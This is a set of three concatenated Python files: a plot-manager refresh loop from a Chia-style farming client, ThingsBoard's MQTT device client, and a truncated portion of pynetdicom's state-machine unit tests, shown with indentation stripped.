self.cache = Cache(self.root_path.resolve() / "cache" / "plot_manager.dat")
self.match_str = match_str
self.show_memo = show_memo
self.open_no_key_filenames = open_no_key_filenames
self.last_refresh_time = 0
self.refresh_parameter = refresh_parameter
self.log = logging.getLogger(__name__)
self._lock = threading.Lock()
self._refresh_thread = None
self._refreshing_enabled = False
self._refresh_callback = refresh_callback # type: ignore
def __enter__(self):
self._lock.acquire()
def __exit__(self, exc_type, exc_value, exc_traceback):
self._lock.release()
def set_refresh_callback(self, callback: Callable):
self._refresh_callback = callback # type: ignore
def set_public_keys(self, farmer_public_keys: List[G1Element], pool_public_keys: List[G1Element]):
self.farmer_public_keys = farmer_public_keys
self.pool_public_keys = pool_public_keys
def public_keys_available(self):
return len(self.farmer_public_keys) and len(self.pool_public_keys)
def plot_count(self):
with self:
return len(self.plots)
def get_duplicates(self):
result = []
for plot_filename, paths_entry in self.plot_filename_paths.items():
_, duplicated_paths = paths_entry
for path in duplicated_paths:
result.append(Path(path) / plot_filename)
return result
def needs_refresh(self) -> bool:
return time.time() - self.last_refresh_time > float(self.refresh_parameter.interval_seconds)
def start_refreshing(self):
self._refreshing_enabled = True
if self._refresh_thread is None or not self._refresh_thread.is_alive():
self.cache.load()
self._refresh_thread = threading.Thread(target=self._refresh_task)
self._refresh_thread.start()
def stop_refreshing(self):
self._refreshing_enabled = False
if self._refresh_thread is not None and self._refresh_thread.is_alive():
self._refresh_thread.join()
self._refresh_thread = None
def trigger_refresh(self):
log.debug("trigger_refresh")
self.last_refresh_time = 0
def _refresh_task(self):
while self._refreshing_enabled:
while not self.needs_refresh() and self._refreshing_enabled:
time.sleep(1)
if not self._refreshing_enabled:
return
plot_filenames: Dict[Path, List[Path]] = get_plot_filenames(self.root_path)
plot_directories: Set[Path] = set(plot_filenames.keys())
plot_paths: List[Path] = []
for paths in plot_filenames.values():
plot_paths += paths
total_result: PlotRefreshResult = PlotRefreshResult()
total_size = len(plot_paths)
self._refresh_callback(PlotRefreshEvents.started, PlotRefreshResult(remaining=total_size))
# First drop all plots we have in plot_filename_paths but not longer in the filesystem or set in config
def plot_removed(test_path: Path):
return not test_path.exists() or test_path.parent not in plot_directories
filenames_to_remove: List[str] = []
for plot_filename, paths_entry in self.plot_filename_paths.items():
loaded_path, duplicated_paths = paths_entry
loaded_plot = Path(loaded_path) / Path(plot_filename)
if plot_removed(loaded_plot):
filenames_to_remove.append(plot_filename)
if loaded_plot in self.plots:
del self.plots[loaded_plot]
total_result.removed += 1
# No need to check the duplicates here since we drop the whole entry
continue
paths_to_remove: List[str] = []
for path in duplicated_paths:
if plot_removed(Path(path) / Path(plot_filename)):
paths_to_remove.append(path)
total_result.removed += 1
for path in paths_to_remove:
duplicated_paths.remove(path)
for filename in filenames_to_remove:
del self.plot_filename_paths[filename]
def batches() -> Iterator[Tuple[int, List[Path]]]:
if total_size > 0:
for batch_start in range(0, total_size, self.refresh_parameter.batch_size):
batch_end = min(batch_start + self.refresh_parameter.batch_size, total_size)
yield total_size - batch_end, plot_paths[batch_start:batch_end]
else:
yield 0, []
for remaining, batch in batches():
batch_result: PlotRefreshResult = self.refresh_batch(batch, plot_directories)
if not self._refreshing_enabled:
self.log.debug("refresh_plots: Aborted")
break
# Set the remaining files since `refresh_batch()` doesn't know them but we want to report it
batch_result.remaining = remaining
total_result.loaded += batch_result.loaded
total_result.processed += batch_result.processed
total_result.duration += batch_result.duration
self._refresh_callback(PlotRefreshEvents.batch_processed, batch_result)
if remaining == 0:
break
batch_sleep = self.refresh_parameter.batch_sleep_milliseconds
self.log.debug(f"refresh_plots: Sleep {batch_sleep} milliseconds")
time.sleep(float(batch_sleep) / 1000.0)
if self._refreshing_enabled:
self._refresh_callback(PlotRefreshEvents.done, total_result)
# Cleanup unused cache
available_ids = set([plot_info.prover.get_id() for plot_info in self.plots.values()])
invalid_cache_keys = [plot_id for plot_id in self.cache.keys() if plot_id not in available_ids]
self.cache.remove(invalid_cache_keys)
self.log.debug(f"_refresh_task: cached entries removed: {len(invalid_cache_keys)}")
if self.cache.changed():
self.cache.save()
self.last_refresh_time = time.time()
self.log.debug(
f"_refresh_task: total_result.loaded {total_result.loaded}, "
f"total_result.removed {total_result.removed}, "
f"total_duration {total_result.duration:.2f} seconds"
)
def refresh_batch(self, plot_paths: List[Path], plot_directories: Set[Path]) -> PlotRefreshResult:
start_time: float = time.time()
result: PlotRefreshResult = PlotRefreshResult(processed=len(plot_paths))
counter_lock = threading.Lock()
log.debug(f"refresh_batch: {len(plot_paths)} files in directories {plot_directories}")
if self.match_str is not None:
log.info(f'Only loading plots that contain "{self.match_str}" in the file or directory name')
def process_file(file_path: Path) -> Optional[PlotInfo]:
if not self._refreshing_enabled:
return None
filename_str = str(file_path)
if self.match_str is not None and self.match_str not in filename_str:
return None
if (
file_path in self.failed_to_open_filenames
and (time.time() - self.failed_to_open_filenames[file_path])
< self.refresh_parameter.retry_invalid_seconds
):
# Try once every `refresh_parameter.retry_invalid_seconds` seconds to open the file
return None
if file_path in self.plots:
return self.plots[file_path]
entry: Optional[Tuple[str, Set[str]]] = self.plot_filename_paths.get(file_path.name)
if entry is not None:
loaded_parent, duplicates = entry
if str(file_path.parent) in duplicates:
log.debug(f"Skip duplicated plot {str(file_path)}")
return None
try:
if not file_path.exists():
return None
prover = DiskProver(str(file_path))
log.debug(f"process_file {str(file_path)}")
expected_size = _expected_plot_size(prover.get_size()) * UI_ACTUAL_SPACE_CONSTANT_FACTOR
stat_info = file_path.stat()
# TODO: consider checking if the file was just written to (which would mean that the file is still
# being copied). A segfault might happen in this edge case.
if prover.get_size() >= 30 and stat_info.st_size < 0.98 * expected_size:
log.warning(
f"Not farming plot {file_path}. Size is {stat_info.st_size / (1024**3)} GiB, but expected"
f" at least: {expected_size / (1024 ** 3)} GiB. We assume the file is being copied."
)
return None
cache_entry = self.cache.get(prover.get_id())
if cache_entry is None:
(
pool_public_key_or_puzzle_hash,
farmer_public_key,
local_master_sk,
) = parse_plot_info(prover.get_memo())
# Only use plots that correct keys associated with them
if farmer_public_key not in self.farmer_public_keys:
log.warning(f"Plot {file_path} has a farmer public key that is not in the farmer's pk list.")
self.no_key_filenames.add(file_path)
if not self.open_no_key_filenames:
return None
pool_public_key: Optional[G1Element] = None
pool_contract_puzzle_hash: Optional[bytes32] = None
if isinstance(pool_public_key_or_puzzle_hash, G1Element):
pool_public_key = pool_public_key_or_puzzle_hash
else:
assert isinstance(pool_public_key_or_puzzle_hash, bytes32)
pool_contract_puzzle_hash = pool_public_key_or_puzzle_hash
if pool_public_key is not None and pool_public_key not in self.pool_public_keys:
log.warning(f"Plot {file_path} has a pool public key that is not in the farmer's pool pk list.")
self.no_key_filenames.add(file_path)
if not self.open_no_key_filenames:
return None
local_sk = master_sk_to_local_sk(local_master_sk)
plot_public_key: G1Element = ProofOfSpace.generate_plot_public_key(
local_sk.get_g1(), farmer_public_key, pool_contract_puzzle_hash is not None
)
cache_entry = CacheEntry(pool_public_key, pool_contract_puzzle_hash, plot_public_key)
self.cache.update(prover.get_id(), cache_entry)
with self.plot_filename_paths_lock:
paths: Optional[Tuple[str, Set[str]]] = self.plot_filename_paths.get(file_path.name)
if paths is None:
paths = (str(Path(prover.get_filename()).parent), set())
self.plot_filename_paths[file_path.name] = paths
else:
paths[1].add(str(Path(prover.get_filename()).parent))
log.warning(f"Have multiple copies of the plot {file_path.name} in {[paths[0], *paths[1]]}.")
return None
new_plot_info: PlotInfo = PlotInfo(
prover,
cache_entry.pool_public_key,
cache_entry.pool_contract_puzzle_hash,
cache_entry.plot_public_key,
stat_info.st_size,
stat_info.st_mtime,
)
with counter_lock:
result.loaded += 1
if file_path in self.failed_to_open_filenames:
del self.failed_to_open_filenames[file_path]
except Exception as e:
tb = traceback.format_exc()
log.error(f"Failed to open file {file_path}. {e} {tb}")
self.failed_to_open_filenames[file_path] = int(time.time())
return None
log.info(f"Found plot {file_path} of size {new_plot_info.prover.get_size()}")
if self.show_memo:
plot_memo: bytes32
if pool_contract_puzzle_hash is None:
plot_memo = stream_plot_info_pk(pool_public_key, farmer_public_key, local_master_sk)
else:
plot_memo = stream_plot_info_ph(pool_contract_puzzle_hash, farmer_public_key, local_master_sk)
plot_memo_str: str = plot_memo.hex()
log.info(f"Memo: {plot_memo_str}")
return new_plot_info
with self, ThreadPoolExecutor() as executor:
plots_refreshed: Dict[Path, PlotInfo] = {}
for new_plot in executor.map(process_file, plot_paths):
if new_plot is not None:
plots_refreshed[Path(new_plot.prover.get_filename())] = new_plot
self.plots.update(plots_refreshed)
result.duration = time.time() - start_time
self.log.debug(
f"refresh_batch: loaded {result.loaded}, "
f"removed {result.removed}, processed {result.processed}, "
f"remaining {result.remaining}, batch_size {self.refresh_parameter.batch_size}, "
f"duration: {result.duration:.2f} seconds"
)
return result
|
tb_device_mqtt.py
|
# Copyright 2020. ThingsBoard
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import queue
import ssl
import time
from threading import RLock
from threading import Thread
import paho.mqtt.client as paho
from simplejson import dumps
from thingsboard_gateway.tb_utility.tb_utility import TBUtility
RPC_RESPONSE_TOPIC = 'v1/devices/me/rpc/response/'
RPC_REQUEST_TOPIC = 'v1/devices/me/rpc/request/'
ATTRIBUTES_TOPIC = 'v1/devices/me/attributes'
ATTRIBUTES_TOPIC_REQUEST = 'v1/devices/me/attributes/request/'
ATTRIBUTES_TOPIC_RESPONSE = 'v1/devices/me/attributes/response/'
TELEMETRY_TOPIC = 'v1/devices/me/telemetry'
log = logging.getLogger("tb_connection")
class TBTimeoutException(Exception):
pass
class TBQoSException(Exception):
pass
class TBPublishInfo:
TB_ERR_AGAIN = -1
TB_ERR_SUCCESS = 0
TB_ERR_NOMEM = 1
TB_ERR_PROTOCOL = 2
TB_ERR_INVAL = 3
TB_ERR_NO_CONN = 4
TB_ERR_CONN_REFUSED = 5
TB_ERR_NOT_FOUND = 6
TB_ERR_CONN_LOST = 7
TB_ERR_TLS = 8
TB_ERR_PAYLOAD_SIZE = 9
TB_ERR_NOT_SUPPORTED = 10
TB_ERR_AUTH = 11
TB_ERR_ACL_DENIED = 12
TB_ERR_UNKNOWN = 13
TB_ERR_ERRNO = 14
TB_ERR_QUEUE_SIZE = 15
def __init__(self, message_info):
self.message_info = message_info
# pylint: disable=invalid-name
def rc(self):
return self.message_info.rc
def mid(self):
return self.message_info.mid
def get(self):
self.message_info.wait_for_publish()
return self.message_info.rc
class TBDeviceMqttClient:
def __init__(self, host, port=1883, token=None, quality_of_service=None):
self._client = paho.Client()
self.quality_of_service = quality_of_service if quality_of_service is not None else 1
self.__host = host
self.__port = port
if token == "":
log.warning("token is not set, connection without tls wont be established")
else:
self._client.username_pw_set(token)
self._lock = RLock()
self._attr_request_dict = {}
self.stopped = False
self.__timeout_queue = queue.Queue()
self.__timeout_thread = Thread(target=self.__timeout_check)
self.__timeout_thread.daemon = True
self.__timeout_thread.start()
self.__is_connected = False
self.__device_on_server_side_rpc_response = None
self.__connect_callback = None
self.__device_max_sub_id = 0
self.__device_client_rpc_number = 0
self.__device_sub_dict = {}
self.__device_client_rpc_dict = {}
self.__attr_request_number = 0
self._client.on_connect = self._on_connect
# self._client.on_log = self._on_log
self._client.on_publish = self._on_publish
self._client.on_message = self._on_message
self._client.on_disconnect = self._on_disconnect
# def _on_log(self, client, userdata, level, buf):
# if isinstance(buf, Exception):
# log.exception(buf)
# else:
# log.debug("%s - %s - %s - %s", client, userdata, level, buf)
def _on_publish(self, client, userdata, result):
# log.debug("Data published to ThingsBoard!")
pass
def _on_disconnect(self, client, userdata, result_code):
prev_level = log.level
log.setLevel("DEBUG")
log.debug("Disconnected client: %s, user data: %s, result code: %s", str(client), str(userdata), str(result_code))
log.setLevel(prev_level)
def _on_connect(self, client, userdata, flags, result_code, *extra_params):
result_codes = {
1: "incorrect protocol version",
2: "invalid client identifier",
3: "server unavailable",
4: "bad username or password",
5: "not authorised",
}
if self.__connect_callback:
time.sleep(.05)
self.__connect_callback(client, userdata, flags, result_code, *extra_params)
if result_code == 0:
self.__is_connected = True
log.info("connection SUCCESS")
self._client.subscribe(ATTRIBUTES_TOPIC, qos=self.quality_of_service)
self._client.subscribe(ATTRIBUTES_TOPIC + "/response/+", qos=self.quality_of_service)
self._client.subscribe(RPC_REQUEST_TOPIC + '+', qos=self.quality_of_service)
self._client.subscribe(RPC_RESPONSE_TOPIC + '+', qos=self.quality_of_service)
else:
if result_code in result_codes:
log.error("connection FAIL with error %s %s", result_code, result_codes[result_code])
else:
log.error("connection FAIL with unknown error")
def is_connected(self):
return self.__is_connected
def connect(self, callback=None, min_reconnect_delay=1, timeout=120, tls=False, ca_certs=None, cert_file=None, key_file=None, keepalive=120):
if tls:
try:
self._client.tls_set(ca_certs=ca_certs,
certfile=cert_file,
keyfile=key_file,
cert_reqs=ssl.CERT_REQUIRED,
tls_version=ssl.PROTOCOL_TLSv1_2,
ciphers=None)
self._client.tls_insecure_set(False)
except ValueError:
pass
self._client.connect(self.__host, self.__port, keepalive=keepalive)
self.reconnect_delay_set(min_reconnect_delay, timeout)
self._client.loop_start()
self.__connect_callback = callback
def disconnect(self):
self._client.disconnect()
log.debug(self._client)
log.debug("Disconnecting from ThingsBoard")
self.__is_connected = False
self._client.loop_stop()
def stop(self):
self.stopped = True
def _on_message(self, client, userdata, message):
content = TBUtility.decode(message)
self._on_decoded_message(content, message)
def _on_decoded_message(self, content, message):
if message.topic.startswith(RPC_REQUEST_TOPIC):
request_id = message.topic[len(RPC_REQUEST_TOPIC):len(message.topic)]
if self.__device_on_server_side_rpc_response:
self.__device_on_server_side_rpc_response(request_id, content)
elif message.topic.startswith(RPC_RESPONSE_TOPIC):
with self._lock:
request_id = int(message.topic[len(RPC_RESPONSE_TOPIC):len(message.topic)])
callback = self.__device_client_rpc_dict.pop(request_id)
callback(request_id, content, None)
elif message.topic == ATTRIBUTES_TOPIC:
dict_results = []
with self._lock:
# callbacks for everything
if self.__device_sub_dict.get("*"):
for subscription_id in self.__device_sub_dict["*"]:
dict_results.append(self.__device_sub_dict["*"][subscription_id])
# specific callback
keys = content.keys()
keys_list = []
for key in keys:
keys_list.append(key)
# iterate through message
for key in keys_list:
# find key in our dict
if self.__device_sub_dict.get(key):
for subscription in self.__device_sub_dict[key]:
dict_results.append(self.__device_sub_dict[key][subscription])
for res in dict_results:
res(content, None)
elif message.topic.startswith(ATTRIBUTES_TOPIC_RESPONSE):
with self._lock:
req_id = int(message.topic[len(ATTRIBUTES_TOPIC+"/response/"):])
# pop callback and use it
callback = self._attr_request_dict.pop(req_id)
callback(content, None)
def max_inflight_messages_set(self, inflight):
"""Set the maximum number of messages with QoS>0 that can be part way through their network flow at once.
Defaults to 20. Increasing this value will consume more memory but can increase throughput."""
self._client.max_inflight_messages_set(inflight)
def max_queued_messages_set(self, queue_size):
"""Set the maximum number of outgoing messages with QoS>0 that can be pending in the outgoing message queue.
Defaults to 0. 0 means unlimited. When the queue is full, any further outgoing messages would be dropped."""
self._client.max_queued_messages_set(queue_size)
def reconnect_delay_set(self, min_delay=1, max_delay=120):
"""The client will automatically retry connection. Between each attempt it will wait a number of seconds
between min_delay and max_delay. When the connection is lost, initially the reconnection attempt is delayed
of min_delay seconds. It’s doubled between subsequent attempt up to max_delay. The delay is reset to min_delay
when the connection complete (e.g. the CONNACK is received, not just the TCP connection is established)."""
self._client.reconnect_delay_set(min_delay, max_delay)
def send_rpc_reply(self, req_id, resp, quality_of_service=None, wait_for_publish=False):
quality_of_service = quality_of_service if quality_of_service is not None else self.quality_of_service
if quality_of_service not in (0, 1):
log.error("Quality of service (qos) value must be 0 or 1")
return None
info = self._client.publish(RPC_RESPONSE_TOPIC + req_id, resp, qos=quality_of_service)
if wait_for_publish:
info.wait_for_publish()
def send_rpc_call(self, method, params, callback):
with self._lock:
self.__device_client_rpc_number += 1
self.__device_client_rpc_dict.update({self.__device_client_rpc_number: callback})
rpc_request_id = self.__device_client_rpc_number
payload = {"method": method, "params": params}
self._client.publish(RPC_REQUEST_TOPIC + str(rpc_request_id),
dumps(payload),
qos=self.quality_of_service)
def set_server_side_rpc_request_handler(self, handler):
self.__device_on_server_side_rpc_response = handler
def publish_data(self, data, topic, qos):
data = dumps(data)
if qos is None:
qos = self.quality_of_service
if qos not in (0, 1):
log.exception("Quality of service (qos) value must be 0 or 1")
raise TBQoSException("Quality of service (qos) value must be 0 or 1")
return TBPublishInfo(self._client.publish(topic, data, qos))
def send_telemetry(self, telemetry, quality_of_service=None):
quality_of_service = quality_of_service if quality_of_service is not None else self.quality_of_service
if not isinstance(telemetry, list) and not (isinstance(telemetry, dict) and telemetry.get("ts") is not None):
telemetry = [telemetry]
return self.publish_data(telemetry, TELEMETRY_TOPIC, quality_of_service)
def send_attributes(self, attributes, quality_of_service=None):
quality_of_service = quality_of_service if quality_of_service is not None else self.quality_of_service
return self.publish_data(attributes, ATTRIBUTES_TOPIC, quality_of_service)
def unsubscribe_from_attribute(self, subscription_id):
with self._lock:
for attribute in self.__device_sub_dict:
if self.__device_sub_dict[attribute].get(subscription_id):
del self.__device_sub_dict[attribute][subscription_id]
log.debug("Unsubscribed from %s, subscription id %i", attribute, subscription_id)
if subscription_id == '*':
self.__device_sub_dict = {}
self.__device_sub_dict = dict((k, v) for k, v in self.__device_sub_dict.items() if v)
def subscribe_to_all_attributes(self, callback):
return self.subscribe_to_attribute("*", callback)
def subscribe_to_attribute(self, key, callback):
with self._lock:
self.__device_max_sub_id += 1
if key not in self.__device_sub_dict:
self.__device_sub_dict.update({key: {self.__device_max_sub_id: callback}})
else:
self.__device_sub_dict[key].update({self.__device_max_sub_id: callback})
log.debug("Subscribed to %s with id %i", key, self.__device_max_sub_id)
return self.__device_max_sub_id
def request_attributes(self, client_keys=None, shared_keys=None, callback=None):
msg = {}
if client_keys:
tmp = ""
for key in client_keys:
tmp += key + ","
tmp = tmp[:len(tmp) - 1]
msg.update({"clientKeys": tmp})
if shared_keys:
tmp = ""
for key in shared_keys:
tmp += key + ","
tmp = tmp[:len(tmp) - 1]
msg.update({"sharedKeys": tmp})
ts_in_millis = int(round(time.time() * 1000))
attr_request_number = self._add_attr_request_callback(callback)
info = self._client.publish(topic=ATTRIBUTES_TOPIC_REQUEST + str(self.__attr_request_number),
payload=dumps(msg),
qos=self.quality_of_service)
self._add_timeout(attr_request_number, ts_in_millis + 30000)
return info
def _add_timeout(self, attr_request_number, timestamp):
self.__timeout_queue.put({"ts": timestamp, "attribute_request_id": attr_request_number})
def _add_attr_request_callback(self, callback):
with self._lock:
self.__attr_request_number += 1
self._attr_request_dict.update({self.__attr_request_number: callback})
attr_request_number = self.__attr_request_number
return attr_request_number
def __timeout_check(self):
while not self.stopped:
if not self.__timeout_queue.empty():
item = self.__timeout_queue.get_nowait()
if item is not None:
while not self.stopped:
current_ts_in_millis = int(round(time.time() * 1000))
if current_ts_in_millis > item["ts"]:
break
time.sleep(0.001)
with self._lock:
callback = None
if item.get("attribute_request_id"):
if self._attr_request_dict.get(item["attribute_request_id"]):
callback = self._attr_request_dict.pop(item["attribute_request_id"])
elif item.get("rpc_request_id"):
if self.__device_client_rpc_dict.get(item["rpc_request_id"]):
callback = self.__device_client_rpc_dict.pop(item["rpc_request_id"])
if callback is not None:
callback(None, TBTimeoutException("Timeout while waiting for a reply from ThingsBoard!"))
else:
time.sleep(0.01)
|
test_fsm.py
|
"""Unit tests for fsm.py"""
import datetime
import logging
import select
import socket
from struct import pack
import sys
import threading
import time
import pytest
from pynetdicom import AE, build_context, evt, debug_logger
from pynetdicom.association import Association
from pynetdicom import fsm as FINITE_STATE
from pynetdicom.fsm import *
from pynetdicom.dimse_primitives import C_ECHO
from pynetdicom.pdu_primitives import (
A_ASSOCIATE, A_ABORT, A_P_ABORT, P_DATA, A_RELEASE,
MaximumLengthNotification, ImplementationClassUIDNotification
)
from pynetdicom.pdu import A_RELEASE_RQ
from pynetdicom.sop_class import VerificationSOPClass
from pynetdicom.transport import AssociationSocket
from pynetdicom.utils import validate_ae_title
from .dummy_c_scp import DummyVerificationSCP, DummyBaseSCP
from .encoded_pdu_items import (
a_associate_ac, a_associate_rq, a_associate_rj, p_data_tf, a_abort,
a_release_rq, a_release_rp,
)
from .parrot import ThreadedParrot
#debug_logger()
REFERENCE_BAD_EVENTS = [
# Event, bad states
("Evt1", [2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13]), # A-ASSOCIATE (rq) p
("Evt2", [1, 2, 3, 5, 6, 7, 8, 9, 10, 11, 12, 13]), # Connection available
("Evt3", [1, 4]), # A-ASSOCIATE-AC PDU recv
("Evt4", [1, 4]), # A-ASSOCIATE-RJ PDU recv
("Evt5", [2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13]), # Connection open
("Evt6", [1, 4]), # A-ASSOCIATE-RQ PDU recv
("Evt7", [1, 2, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13]), # A-ASSOCIATE (ac) p
("Evt8", [1, 2, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13]), # A-ASSOCIATE (rj) p
("Evt9", [1, 2, 3, 4, 5, 7, 9, 10, 11, 12, 13]), # P-DATA primitive
("Evt10", [1, 4]), # P-DATA-TF PDU
("Evt11", [1, 2, 3, 4, 5, 7, 8, 9, 10, 11, 12, 13]), # A-RELEASE (rq) p
("Evt12", [1, 4]), # A-RELEASE-RQ PDU recv
("Evt13", [1, 4]), # A-RELEASE-RP PDU recv
("Evt14", [1, 2, 3, 4, 5, 6, 7, 10, 11, 13]), # A-RELEASE (rsp) primitive
("Evt15", [1, 2, 13]), # A-ABORT (rq) primitive
("Evt16", [1, 4]), # A-ABORT PDU recv
("Evt17", [1]), # Connection closed
("Evt18", [1, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12]), # ARTIM expired
("Evt19", [1, 4]), # Unrecognised PDU rev
]
REFERENCE_GOOD_EVENTS = [
# Event, good states
("Evt1", [1]), # A-ASSOCIATE (rq) p
("Evt2", [4]), # Connection available
("Evt3", [2, 3, 5, 6, 7, 8, 9, 10, 11, 12, 13]), # A-ASSOCIATE-AC PDU recv
("Evt4", [2, 3, 5, 6, 7, 8, 9, 10, 11, 12, 13]), # A-ASSOCIATE-RJ PDU recv
("Evt5", [1]), # Connection open
("Evt6", [2, 3, 5, 6, 7, 8, 9, 10, 11, 12, 13]), # A-ASSOCIATE-RQ PDU recv
("Evt7", [3]), # A-ASSOCIATE (ac) p
("Evt8", [3]), # A-ASSOCIATE (rj) p
("Evt9", [6, 8]), # P-DATA primitive
("Evt10", [2, 3, 5, 6, 7, 8, 9, 10, 11, 12, 13]), # P-DATA-TF PDU
("Evt11", [6]), # A-RELEASE (rq) p
("Evt12", [2, 3, 5, 6, 7, 8, 9, 10, 11, 12, 13]), # A-RELEASE-RQ PDU recv
("Evt13", [2, 3, 5, 6, 7, 8, 9, 10, 11, 12, 13]), # A-RELEASE-RP PDU recv
("Evt14", [8, 9, 12]), # A-RELEASE (rsp) primitive
("Evt15", [3, 4, 5, 6, 7, 8, 9, 10, 11, 12]), # A-ABORT (rq) primitive
("Evt16", [2, 3, 5, 6, 7, 8, 9, 10, 11, 12, 13]), # A-ABORT PDU recv
("Evt17", [2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13]), # Connection closed
("Evt18", [2, 13]), # ARTIM expired
("Evt19", [2, 3, 5, 6, 7, 8, 9, 10, 11, 12, 13]), # Unrecognised PDU rev
]
class BadDUL(object):
"""A DUL that always raises an exception during actions."""
def __init__(self):
self.is_killed = False
def kill_dul(self):
"""Hook for testing whether DUL got killed."""
self.is_killed = True
@property
def primitive(self):
"""Prevent StateMachine from setting primitive."""
return None
class TestStateMachine(object):
"""Non-functional unit tests for fsm.StateMachine."""
def test_init(self):
"""Test creation of new StateMachine."""
ae = AE()
ae.add_requested_context(VerificationSOPClass)
ae.acse_timeout = 5
ae.dimse_timeout = 5
assoc = Association(ae, mode='requestor')
fsm = assoc.dul.state_machine
assert fsm.current_state == 'Sta1'
assert fsm.dul == assoc.dul
def test_invalid_transition_raises(self):
"""Test StateMachine.transition using invalid states raises."""
ae = AE()
ae.add_requested_context(VerificationSOPClass)
ae.acse_timeout = 5
ae.dimse_timeout = 5
assoc = Association(ae, mode='requestor')
fsm = assoc.dul.state_machine
msg = r"Invalid state 'Sta0' for State Machine"
with pytest.raises(ValueError, match=msg):
fsm.transition('Sta0')
def test_valid_transition(self):
"""Test StateMachine.transition using valid states."""
ae = AE()
ae.add_requested_context(VerificationSOPClass)
ae.acse_timeout = 5
ae.dimse_timeout = 5
assoc = Association(ae, mode='requestor')
fsm = assoc.dul.state_machine
for ii in range(1, 14):
assert 1 <= ii <= 13
fsm.transition("Sta{}".format(ii))
assert fsm.current_state == "Sta{}".format(ii)
@pytest.mark.parametrize("event, states", REFERENCE_BAD_EVENTS)
def test_invalid_action_raises(self, event, states):
"""Test StateMachine.do_action raises exception if action invalid."""
ae = AE()
ae.add_requested_context(VerificationSOPClass)
ae.acse_timeout = 5
ae.dimse_timeout = 5
assoc = Association(ae, mode='requestor')
fsm = assoc.dul.state_machine
for state in states:
state = "Sta{}".format(state)
fsm.current_state = state
msg = msg = (
r"Invalid event '{}' for the current state '{}'"
.format(event, state)
)
with pytest.raises(InvalidEventError, match=msg):
fsm.do_action(event)
@pytest.mark.parametrize("event, states", REFERENCE_GOOD_EVENTS)
def test_exception_during_action(self, event, states):
"""Test an exception raised during an action kill the DUL."""
ae = AE()
ae.add_requested_context(VerificationSOPClass)
ae.acse_timeout = 5
ae.dimse_timeout = 5
assoc = Association(ae, mode='requestor')
fsm = assoc.dul.state_machine
fsm.dul = BadDUL()
for state in states:
fsm.dul.is_killed = False
state = "Sta{}".format(state)
fsm.current_state = state
with pytest.raises(AttributeError):
fsm.do_action(event)
assert fsm.dul.is_killed is True
assert fsm.current_state == state
class TestStateBase(object):
"""Base class for State tests."""
def setup(self):
ae = AE()
ae.add_requested_context(VerificationSOPClass)
ae.acse_timeout = 5
ae.dimse_timeout = 5
assoc = Association(ae, mode='requestor')
assoc.set_socket(AssociationSocket(assoc))
# Association Acceptor object -> remote AE
assoc.acceptor.ae_title = validate_ae_title(b'ANY_SCU')
assoc.acceptor.address = 'localhost'
assoc.acceptor.port = 11112
# Association Requestor object -> local AE
assoc.requestor.address = ''
assoc.requestor.port = 11113
assoc.requestor.ae_title = ae.ae_title
assoc.requestor.maximum_length = 16382
assoc.requestor.implementation_class_uid = (
ae.implementation_class_uid
)
assoc.requestor.implementation_version_name = (
ae.implementation_version_name
)
cx = build_context(VerificationSOPClass)
cx.context_id = 1
assoc.requestor.requested_contexts = [cx]
self.assoc = assoc
self.fsm = self.monkey_patch(assoc.dul.state_machine)
def teardown(self):
for thread in threading.enumerate():
if isinstance(thread, ThreadedParrot):
thread.shutdown()
def get_associate(self, assoc_type):
primitive = A_ASSOCIATE()
if assoc_type == 'request':
primitive.application_context_name = '1.2.3.4.5.6'
# Calling AE Title is the source DICOM AE title
primitive.calling_ae_title = b'LOCAL_AE_TITLE '
# Called AE Title is the destination DICOM AE title
primitive.called_ae_title = b'REMOTE_AE_TITLE '
# The TCP/IP address of the source, pynetdicom includes port too
primitive.calling_presentation_address = ('', 0)
# The TCP/IP address of the destination, pynetdicom includes port too
primitive.called_presentation_address = ('localhost', 11112)
# Proposed presentation contexts
cx = build_context(VerificationSOPClass)
cx.context_id = 1
primitive.presentation_context_definition_list = [cx]
user_info = []
item = MaximumLengthNotification()
item.maximum_length_received = 16382
user_info.append(item)
item = ImplementationClassUIDNotification()
item.implementation_class_uid = '1.2.3.4'
user_info.append(item)
primitive.user_information = user_info
elif assoc_type == 'accept':
primitive.application_context_name = '1.2.3.4.5.6'
# Calling AE Title is the source DICOM AE title
primitive.calling_ae_title = b'LOCAL_AE_TITLE '
# Called AE Title is the destination DICOM AE title
primitive.called_ae_title = b'REMOTE_AE_TITLE '
# The TCP/IP address of the source, pynetdicom includes port too
primitive.result = 0x00
primitive.result_source = 0x01
# Proposed presentation contexts
cx = build_context(VerificationSOPClass)
cx.context_id = 1
primitive.presentation_context_definition_results_list = [cx]
user_info = []
item = MaximumLengthNotification()
item.maximum_length_received = 16383
user_info.append(item)
item = ImplementationClassUIDNotification()
item.implementation_class_uid = '1.2.3.4.5'
user_info.append(item)
primitive.user_information = user_info
elif assoc_type == 'reject':
primitive.result = 0x01
primitive.result_source = 0x01
primitive.diagnostic = 0x01
return primitive
def get_release(self, is_response=False):
primitive = A_RELEASE()
if is_response:
primitive.result = 'affirmative'
return primitive
def get_abort(self, is_ap=False):
if is_ap:
primitive = A_P_ABORT()
primitive.provider_reason = 0x00
else:
primitive = A_ABORT()
primitive.abort_source = 0x00
return primitive
def get_pdata(self):
item = [1, p_data_tf[10:]]
primitive = P_DATA()
primitive.presentation_data_value_list.append(item)
return primitive
def monkey_patch(self, fsm):
"""Monkey patch the StateMachine to add testing hooks."""
# Record all state transitions
fsm._transitions = []
fsm.original_transition = fsm.transition
def transition(state):
fsm._transitions.append(state)
fsm.original_transition(state)
fsm.transition = transition
# Record all event/state/actions
fsm._changes = []
fsm._events = []
fsm.original_action = fsm.do_action
def do_action(event):
fsm._events.append(event)
if (event, fsm.current_state) in TRANSITION_TABLE:
action_name = TRANSITION_TABLE[(event, fsm.current_state)]
fsm._changes.append((fsm.current_state, event, action_name))
